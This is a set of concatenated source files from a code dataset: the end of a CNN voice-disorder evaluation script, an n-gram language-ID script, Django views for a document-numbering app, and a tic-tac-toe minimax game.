Classification Accuracy for each fold (file level)\nprint(\"Now showing the result if we search CNN's layers: \")\nprint(\"--------------------------------\")\nprint(\"file results\")\nprint(file_results_SVM)\nprint(sum(file_results_SVM) / len(file_results_SVM))\n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (snippet level)\nprint(\"--------------------------------\")\nprint(\"snippet results\")\nprint(snippet_results_SVM)\nprint(sum(snippet_results_SVM) / len(snippet_results_SVM))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (file level)\nprint(\"--------------------------------\")\nprint(\"final file results\")\nprint(total_file_con_mat_SVM)\n\n\n# ===============================================\nfile_overall_acc = 0;\nfor i in range(len(total_file_con_mat_SVM[0])):\n file_overall_acc = file_overall_acc + total_file_con_mat_SVM[i][i] / sum(total_file_con_mat_SVM[i])\nprint(file_overall_acc / len(classes))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (snippet level)\nprint(\"--------------------------------\")\nprint(\"final snippet results\")\nprint(total_snippet_con_mat_SVM)\n\n\n# ===============================================\nsnippet_overall_acc = 0;\nfor i in range(len(total_snippet_con_mat_SVM[0])):\n snippet_overall_acc = snippet_overall_acc + total_snippet_con_mat_SVM[i][i] / sum(total_snippet_con_mat_SVM[i])\nprint(snippet_overall_acc / len(classes)) ","repo_name":"guwalgiya/Voice-Disorder-Diagnosis","sub_path":"CNN_Approach/Main_one_dataset_experiment.py","file_name":"Main_one_dataset_experiment.py","file_ext":"py","file_size_in_byte":20249,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"36211564567","text":"import pickle\nfrom ngrams import Ngrams, get_bigram_file, get_unigram_file\n\nenglish_training = \"data/LangId.train.English\"\nfrench_training = \"data/LangId.train.French\"\nitalian_training = \"data/LangId.train.Italian\"\n\ntraining_data = [english_training, french_training, italian_training]\n\ntest_data = \"data/LangId.test\"\n\n\ndef main() -> None:\n \"\"\"\n creates training files for different languages or evaluates training data accuracy\n \"\"\"\n\n print(f\"\\n{' Choose one of the option ':=^50}\")\n print(\"1. Create Model\")\n print(\"2. 
Evaluate Model\")\n\n val = int(input(\"Enter a number: \"))\n print()\n\n if (val == 1):\n create_training_data()\n elif (val == 2):\n evaluate()\n else:\n print(\"Please provide correct input\")\n\n\ndef create_training_data() -> None:\n ng = Ngrams()\n\n for f in training_data:\n lang = f.split(\".\")[-1].lower()\n print(\"Creating training data for \" + lang)\n\n unigram_dict, bigram_dict = ng.create_ngrams(f)\n\n with open(get_unigram_file(lang), 'wb') as f:\n pickle.dump(unigram_dict, f)\n\n with open(get_bigram_file(lang), 'wb') as f:\n pickle.dump(bigram_dict, f)\n\n print(\"Training data created for \" + lang)\n\n\ndef evaluate() -> None:\n ng = Ngrams()\n ng.evaluate(test_data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jigneshsatam/NLP","sub_path":"Ngrams/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22485877140","text":"from builtins import super, slice\n\n# from Tools.scripts.patchcheck import status\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Max\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views import generic\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\n\nfrom .form import DokumenForm, EditForm\nfrom django.urls import reverse_lazy\nfrom .models import Dokumen, Fungsi, Klasifikasi, JenisDokumen, TujuanDokumen\nfrom django_select2.forms import Select2MultipleWidget\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom accounts.models import ProfileUser\n\n\n# Create your views here.\n@method_decorator(login_required, name='dispatch')\nclass dashboard(generic.TemplateView):\n\ttemplate_name = 'dokumen/dashboard.html'\n\t\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(dashboard, self).get_context_data()\n\t\tif self.request.user.is_admin:\n\t\t\tcontext['data_surat_masuk'] = Dokumen.objects.exclude(status=3)\n\t\t\tcontext['data_surat_keluar'] = Dokumen.objects.exclude(status=3)\n\t\telif self.request.user.is_staff:\n\t\t\tDokumen.objects.exclude(status=3).filter(fungsi=38).values('tujuandokumen__status')\n\t\t\tcontext['data_surat_keluar'] = Dokumen.objects.exclude(status=3).filter(\n\t\t\t\tfungsi=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\t\t\tcontext['data_surat_masuk'] = Dokumen.objects.exclude(status=3).filter(\n\t\t\t\ttujuan=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk).values('nomor_surat_lengkap','klasifikasi__kode','klasifikasi__nama_klasifikasi','pejabat_penandatangan','tujuandokumen__status','slug')\n\t\t\t# context['coba'] = data\n\t\telif self.request.user.is_staff_dokumen:\n\t\t\tDokumen.objects.exclude(status=3).filter(fungsi=38).values('tujuandokumen__status')\n\t\t\tcontext['data_surat_keluar'] = Dokumen.objects.exclude(status=3).filter(\n\t\t\t\tfungsi=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\n\t\treturn context\n\n\n@method_decorator(login_required, name='dispatch')\nclass BuatDokumen(generic.edit.CreateView):\n\t# http_method_names = \"post\"\n\ttemplate_name = 'dokumen/buat-dokumen.html'\n\tform_class = DokumenForm\n\t\n\tdef get_form_kwargs(self):\n\t\tkwargs = super(BuatDokumen, 
self).get_form_kwargs()\n\t\tkwargs.update({'user': self.request.user})\n\t\tif self.request.user.is_admin:\n\t\t\tkwargs.update({'fungsi': ''})\n\t\telif self.request.user.is_staff or self.request.user.is_staff_dokumen:\n\t\t\tkwargs.update({'fungsi': ProfileUser.objects.get(user=self.request.user.pk)})\n\t\treturn kwargs\n\t\n\tdef form_valid(self, form):\n\t\t# super(BuatDokumen, self).form_valid()\n\t\tpost = form.save(commit=False)\n\t\tbulan = form.cleaned_data['tanggal'].strftime('%m')\n\t\ttahun = int(form.cleaned_data['tanggal'].strftime('%Y'))\n\t\tid_klasifikasi = form.cleaned_data['klasifikasi'].pk\n\t\tkode_klasifikasi = form.cleaned_data['klasifikasi'].kode\n\t\tkode_fungsi = form.cleaned_data['fungsi'].kode\n\t\tkode_dokumen = form.cleaned_data['jenis_dokumen'].kode\n\t\tnomor_surat = 0\n\t\tnomor = Dokumen.objects.filter(klasifikasi=id_klasifikasi, tanggal__year=tahun).aggregate(Max('nomor_surat'))\n\t\tnomor_terakhir = nomor['nomor_surat__max']\n\t\ttahun_terakhir = Dokumen.objects.filter(klasifikasi=id_klasifikasi).order_by('-tanggal').values_list(\"tanggal\",\n\t\t flat=True)[\n\t\t :1]\n\t\t\n\t\tprint(nomor_terakhir)\n\t\t# print(tahun_terakhir.first().year)\n\t\tprint(tahun)\n\t\t\n\t\t# this is still a problem\n\t\tif tahun_terakhir.first() is None:\n\t\t\tprint(\"1\", tahun_terakhir.first())\n\t\t\tnomor_surat = 1\n\t\t\n\t\telif tahun_terakhir.first().year == tahun:\n\t\t\tprint(\"3\", tahun_terakhir.first())\n\t\t\tif nomor_terakhir == 0:\n\t\t\t\tnomor_surat = 1\n\t\t\telse:\n\t\t\t\tnomor_surat = nomor_terakhir + 1\n\t\t\n\t\telif tahun_terakhir.first().year <= tahun:\n\t\t\tprint(\"2\", tahun_terakhir.first())\n\t\t\tnomor_surat = 1\n\t\t\n\t\tprint(\"nomor surat baru\", nomor_surat)\n\t\tpost.nomor_surat_lengkap = \"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan,\n\t\t tahun, kode_fungsi)\n\t\t\n\t\tprint(self.request.POST.getlist('tujuan'))\n\t\tpost.user = self.request.user\n\t\tpost.nomor_surat = nomor_surat\n\t\tprint(\"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan, tahun, kode_fungsi))\n\t\tpost.save()\n\t\tform.save_m2m()\n\t\treturn redirect('dokumen:dashboard')\n\t\n\tdef form_invalid(self, form):\n\t\tprint(form.errors)\n\t\tprint(form.errors.as_data())\n\t\tprint(self.request.POST.getlist('tujuan'))\n\t\treturn HttpResponse(form.errors.as_data())\n\n# def post(self, request, *args, **kwargs):\n# print(request.POST.getlist('tujuan'))\n\n\n@method_decorator(login_required, name='dispatch')\nclass HapusSuratDinas(generic.edit.DeleteView):\n\tmodel = Dokumen\n\tslug_field = 'slug'\n\tsuccess_url = reverse_lazy('dokumen:laporan-surat-dinas')\n\ttemplate_name = 'delete.html'\n\n\n@method_decorator(login_required, name='dispatch')\nclass BatalDokumen(generic.View):\n\tdef get(self, request):\n\t\tslug = request.GET.get('slug', None)\n\t\t# Dokumen.objects.get(slug = slug).delete()\n\t\tDokumen.objects.filter(slug=slug).update(status=\"3\")\n\t\tdata = {\n\t\t\t'deleted': True\n\t\t}\n\t\treturn JsonResponse(data)\n\n@method_decorator(login_required, name='dispatch')\nclass BacaDokumen(generic.View):\n\tdef get(self, request):\n\t\tprint(self.request.user.pk)\n\t\tprint(ProfileUser.objects.get(user=self.request.user.pk).fungsi)\n\t\t# print(TujuanDokumen.objects.get(dokumen__slug='d2ku12201913', fungsi=25))\n\t\t\n\t\tfungsi = ProfileUser.objects.values_list(\"fungsi\", flat=True).get(user=self.request.user.pk)\n\t\tslug = request.GET.get('slug', None)\n\t\ta = 
TujuanDokumen.objects.get(dokumen__slug=slug, fungsi=fungsi)\n\t\ta.status = 1\n\t\ta.save()\n\t\tdata = {\n\t\t\t'read': True\n\t\t}\n\t\treturn JsonResponse(data)\n\n\n@method_decorator(login_required, name='dispatch')\nclass EditDokumen(generic.edit.UpdateView):\n\tslug_field = 'slug'\n\tform_class = EditForm\n\tmodel = Dokumen\n\ttemplate_name = 'dokumen/update-dokumen.html'\n\t\n\tdef get_form_kwargs(self):\n\t\tkwargs = super(EditDokumen, self).get_form_kwargs()\n\t\tkwargs.update({'user': self.request.user})\n\t\tif self.request.user.is_admin:\n\t\t\tkwargs.update({'fungsi': ''})\n\t\telif self.request.user.is_staff or self.request.user.is_staff_dokumen:\n\t\t\tkwargs.update({'fungsi': ProfileUser.objects.get(user=self.request.user.pk)})\n\t\treturn kwargs\n\t\n\tdef form_valid(self, form):\n\t\tpost = form.save(commit=False)\n\t\tbulan = form.cleaned_data['tanggal'].strftime('%m')\n\t\ttahun = int(form.cleaned_data['tanggal'].strftime('%Y'))\n\t\tid_klasifikasi = form.cleaned_data['klasifikasi'].pk\n\t\tkode_klasifikasi = form.cleaned_data['klasifikasi'].kode\n\t\tkode_fungsi = form.cleaned_data['fungsi'].kode\n\t\tkode_dokumen = form.cleaned_data['jenis_dokumen'].kode\n\t\tnomor_surat = 0\n\t\tnomor = Dokumen.objects.filter(klasifikasi=id_klasifikasi, tanggal__year=tahun).aggregate(Max('nomor_surat'))\n\t\tnomor_terakhir = nomor['nomor_surat__max']\n\t\ttahun_terakhir = Dokumen.objects.filter(klasifikasi=id_klasifikasi).order_by('-tanggal').values_list(\"tanggal\",\n\t\t flat=True)[\n\t\t :1]\n\t\tid_klasifikasi_terakhir = Dokumen.objects.get(slug=self.kwargs.get('slug')).klasifikasi_id\n\t\tprint(\"id slug \", self.kwargs.get('slug'))\n\t\tprint(\"id klasifikasi terakhir \", id_klasifikasi_terakhir)\n\t\t#\n\t\tnomor_sekarang = Dokumen.objects.get(slug=self.kwargs.get('slug')).nomor_surat\n\t\tprint('nomor sekarang ',nomor_sekarang)\n\t\tif id_klasifikasi == id_klasifikasi_terakhir:\n\t\t\tnomor_surat = nomor_sekarang\n\t\telse:\n\t\t\tprint(nomor_terakhir)\n\t\t\tprint(tahun)\n\t\t\t# this is still a problem\n\t\t\tif tahun_terakhir.first() is None:\n\t\t\t\tprint(\"1\", tahun_terakhir.first())\n\t\t\t\tnomor_surat = 1\n\t\t\t\n\t\t\telif tahun_terakhir.first().year == tahun:\n\t\t\t\tprint(\"3\", tahun_terakhir.first())\n\t\t\t\tif nomor_terakhir == 0:\n\t\t\t\t\tnomor_surat = 1\n\t\t\t\telse:\n\t\t\t\t\tnomor_surat = nomor_terakhir + 1\n\t\t\t\n\t\t\telif tahun_terakhir.first().year <= tahun:\n\t\t\t\tprint(\"2\", tahun_terakhir.first())\n\t\t\t\tnomor_surat = 1\n\t\t\n\t\tprint(\"nomor surat baru\", nomor_surat)\n\t\tpost.nomor_surat_lengkap = \"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan,\n\t\t tahun, kode_fungsi)\n\t\t\n\t\tprint(self.request.POST.getlist('tujuan'))\n\t\tpost.user = self.request.user\n\t\tpost.nomor_surat = nomor_surat\n\t\tprint(\"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan, tahun, kode_fungsi))\n\t\tpost.save()\n\t\tform.save_m2m()\n\t\treturn redirect('dokumen:dashboard')\n\t\n\tdef form_invalid(self, form):\n\t\treturn self.render_to_response(self.get_context_data(form=form))\n\n\n\n@method_decorator(login_required, name='dispatch')\nclass DetailDokumen(generic.DetailView):\n\ttemplate_name = 'dokumen/detail-dokumen.html'\n\tmodel = Dokumen\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(DetailDokumen, self).get_context_data(**kwargs)\n\t\tcontext['tujuan'] = 
TujuanDokumen.objects.get(fungsi=self.request.session['KODE_FUNGSI'],dokumen=Dokumen.objects.get(slug=self.kwargs.get('slug')).pk)\n\t\tcontext['dokumen'] = Dokumen.objects.get(slug=self.kwargs.get('slug'))\n\t\treturn context\n\n@method_decorator(login_required, name='dispatch')\nclass DetailDokumenKeluar(generic.DetailView):\n\tmodel = Dokumen\n\ttemplate_name = 'dokumen/detail-dokumen-keluar.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tprint(self.kwargs.get('slug'))\n\t\tcontext = super(DetailDokumenKeluar, self).get_context_data(**kwargs)\n\t\tcontext['data_tujuan'] = TujuanDokumen.objects.filter(dokumen__slug=self.kwargs.get('slug'))\n\t\ta = Dokumen.objects.values_list('tujuan_eksternal',flat=True).get(slug=self.kwargs.get('slug'))\n\t\tprint(a)\n\t\tif a is None :\n\t\t\tcontext['tujuan_eksternal'] = None\n\t\telse:\n\t\t\turl = a\n\t\t\tdata = url.split(\"#\")\n\t\t\tcontext['tujuan_eksternal'] = data\n\n\t\t\tprint(a)\n\t\treturn context\n\n@method_decorator(login_required, name='dispatch')\nclass Laporan(generic.TemplateView):\n\ttemplate_name = 'dokumen/laporan-dokumen.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(Laporan, self).get_context_data()\n\t\tif self.request.user.is_admin:\n\t\t\tcontext['data_nota_dinas'] = Dokumen.objects.all()\n\t\telif self.request.user.is_staff:\n\t\t\tprint(ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\t\t\tcontext['data_nota_dinas'] = Dokumen.objects.filter(\n\t\t\t\tfungsi=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\t\t# context['jenis_dokumen'] = JenisDokumen.objects.all()\n\t\treturn context\n# not used\n\n# Cancel Document\n\n# def bataldokumen(request,slug):\n# if request.method == 'POST' and request.is_ajax():\n# try:\n# update = Dokumen.objects.get(slug = slug)\n# update.status = 3\n# update.save()\n# return JsonResponse({'status':'Success', 'msg': 'save successfully'})\n# except:\n# return JsonResponse({'status':'Fail', 'msg': 'Objects doesnt update'})\n# else:\n# return JsonResponse({'status':'Fail', 'msg':'Not a valid request'})\n\n\n# @method_decorator(login_required, name='dispatch')\n# class LaporanSuratDinas(generic.ListView):\n# template_name = 'dokumen/laporan-surat-dinas.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanSuratDinas, self).get_context_data()\n# context['data_surat_dinas'] = Dokumen.objects.filter(jenis_dokumen=5)\n# return context\n#\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanNotaDinas(generic.ListView):\n# template_name = 'dokumen/laporan-nota-dinas.html'\n# model = Dokumen\n#\n# # queryset = Dokumen.objects.filter(jenis_dokumen=4)\n# def get_context_data(self, **kwargs):\n# context = super(LaporanNotaDinas, self).get_context_data()\n# context['data_nota_dinas'] = Dokumen.objects.filter(jenis_dokumen=4)\n#\n# context['jenis_dokumen'] = JenisDokumen.objects.all()\n# return context\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanNotaDiplomatik(generic.ListView):\n# template_name = 'dokumen/laporan-nota-diplomatik.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanNotaDiplomatik, self).get_context_data()\n# context['data_surat_dinas'] = Dokumen.objects.filter(jenis_dokumen=1)\n# return context\n#\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanSuratPerintah(generic.ListView):\n# template_name = 'dokumen/laporan-surat-perintah.html'\n# model = Dokumen\n#\n# def 
get_context_data(self, **kwargs):\n# context = super(LaporanSuratPerintah, self).get_context_data()\n# context['data_surat_perintah'] = Dokumen.objects.filter(jenis_dokumen=2)\n# return context\n#\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanSuratPerintahKerja(generic.ListView):\n# template_name = 'dokumen/laporan-surat-perintah-kerja.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanSuratPerintahKerja, self).get_context_data()\n# context['data_surat_perintah_kerja'] = Dokumen.objects.filter(jenis_dokumen=3)\n# return context\n#\n# @method_decorator(login_required, name='dispatch')\n# class HapusSPK(generic.edit.DeleteView):\n# model = Dokumen\n# slug_field = 'slug'\n# success_url = reverse_lazy('dokumen:laporan-surat-perintah-kerja')\n# template_name = 'delete.html'\n","repo_name":"ahmadsyafiqkamil/edisposisi","sub_path":"dokumen/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18978924065","text":"\nclass State:\n def __init__(self):\n self.board = [\n ['*', '*', '*'],\n ['*', '*', '*'],\n ['*', '*', '*'],\n ]\n\n def print(self):\n for row in self.board:\n print(' '.join(row))\n\n\n def successor(self, action):\n ## return new state\n new_state = State()\n for i in range(3):\n for j in range(3):\n if i != action.row or j != action.col:\n new_state.board[i][j] = self.board[i][j]\n else:\n new_state.board[i][j] = action.player\n return new_state\n\n def get_player(self):\n countX = 0\n countO = 0\n for i in range(3):\n for j in range(3):\n if self.board[i][j] == 'X': countX += 1\n elif self.board[i][j] == 'O': countO += 1\n if countX == countO: return 'X'\n else: return 'O'\n\n def get_n_actions(self):\n count = 0\n for i in range(3):\n for j in range(3):\n if self.board[i][j] == '*': count += 1\n return 9-count\n\n def get_successors_and_actions(self):\n ## return list of (action, next_state)\n player = self.get_player()\n for i in range(3):\n for j in range(3):\n if self.board[i][j] == '*':\n action = Action(i, j, player)\n yield action, self.successor(action)\n\n def is_terminal(self):\n for i in range(3): \n if self.check_row(i, 'X') or self.check_row(i, 'O'): return True\n for j in range(3): \n if self.check_col(j, 'X') or self.check_col(j, 'O'): return True\n if self.check_diag('X') or self.check_diag('O'): return True\n if self.check_other_diag('X') or self.check_other_diag('O'): return True\n if self.get_n_actions() == 9: return True\n return False\n\n def check_row(self, i, player):\n for j in range(3):\n if self.board[i][j] != player: return False\n return True\n\n def check_col(self, j, player):\n for i in range(3):\n if self.board[i][j] != player: return False\n return True\n\n def check_diag(self, player):\n for i in range(3):\n if self.board[i][i] != player: return False\n return True\n\n def check_other_diag(self, player):\n for i in range(3):\n if self.board[i][2-i] != player: return False\n return True\n\n def utility(self):\n if self.is_terminal():\n value = 0\n for i in range(3): \n if self.check_row(i, 'X'): value = 1\n if self.check_row(i, 'O'): value = -1\n for j in range(3): \n if self.check_col(j, 'X'): value = 1\n if self.check_col(j, 'O'): value = -1\n if self.check_diag('X'): value = 1\n if self.check_diag('O'): value = -1\n if self.check_other_diag('X'): value = 1\n if self.check_other_diag('O'): value = -1\n return value - self.get_n_actions()*0.1\n 
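## the 0.1-per-move penalty makes the maximizer X prefer quick wins; since the\n## same signed penalty applies to both players, it also nudges the minimizer O\n## toward longer games -- a quirk of this shaping term.\n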
else: return None\n\n\ndef get_value(state):\n ## return value, best_action\n if state.is_terminal():\n return state.utility(), None\n\n player = state.get_player()\n if player == 'X': return get_max_value(state)\n else: return get_min_value(state)\n\n\ndef get_max_value(state):\n ## return value, best_action\n max_value = -100\n best_action = None\n for action, next_state in state.get_successors_and_actions():\n next_value, _ = get_value(next_state)\n if next_value > max_value:\n max_value = next_value\n best_action = action\n\n assert(best_action is not None)\n return max_value, best_action\n\n\ndef get_min_value(state):\n ## return value, best_action\n min_value = 100\n best_action = None\n for action, next_state in state.get_successors_and_actions():\n next_value, _ = get_value(next_state)\n if next_value < min_value:\n min_value = next_value\n best_action = action\n\n assert(best_action is not None)\n return min_value, best_action\n\nclass Action:\n def __init__(self, row, col, player):\n # player = X or O\n self.row = row\n self.col = col\n self.player = player\n\n def print(self):\n print('row: {}, col: {}, player: {}'.format(self.row, self.col, self.player))\n\n\nif __name__ == '__main__':\n state = State()\n answer = input(\"Do you want to play first (y/n)?\")\n if answer.lower() == 'y':\n human_player = 'X'\n else:\n human_player = 'O'\n current_player = 'X'\n count = 0\n while not state.is_terminal():\n state.print()\n if current_player == human_player:\n valid_actions = list(state.get_successors_and_actions())\n for i, (action, next_state) in enumerate(valid_actions):\n print(i, end=': ')\n action.print()\n answer = input(f\"Your move: [ 0 - {len(valid_actions)-1} ]\")\n action, next_state = valid_actions[int(answer)]\n state = next_state\n else:\n best_value, best_action = get_value(state)\n print(f\"(value={best_value}) I play: \", end='')\n best_action.print()\n state = state.successor(best_action)\n\n count += 1\n current_player = state.get_player()\n \n print(\"Last state\")\n state.print()","repo_name":"phamgialinhlx/ai-assignment","sub_path":"p2/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":5413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
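A possible extension, not in the original file: get_value above re-searches the full game tree on every call. The sketch below applies alpha-beta pruning to the same State/Action API and should return the same root value while visiting fewer states; the module name tictactoe is an assumption taken from this file's name.

## alphabeta_sketch.py -- hypothetical; relies only on the State API defined above.
from tictactoe import State  # assumed module name

def alphabeta(state, alpha=-100.0, beta=100.0):
    """Return (value, best_action) like get_value, with alpha-beta cutoffs."""
    if state.is_terminal():
        return state.utility(), None
    maximizing = state.get_player() == 'X'
    best_value = -100.0 if maximizing else 100.0
    best_action = None
    for action, next_state in state.get_successors_and_actions():
        value, _ = alphabeta(next_state, alpha, beta)
        if maximizing and value > best_value:
            best_value, best_action = value, action
            alpha = max(alpha, best_value)
        elif not maximizing and value < best_value:
            best_value, best_action = value, action
            beta = min(beta, best_value)
        if beta <= alpha:
            break  # remaining siblings cannot change the final choice at this node
    return best_value, best_action

if __name__ == '__main__':
    value, action = alphabeta(State())
    print(value)     # value of the empty board
    action.print()   # one optimal opening move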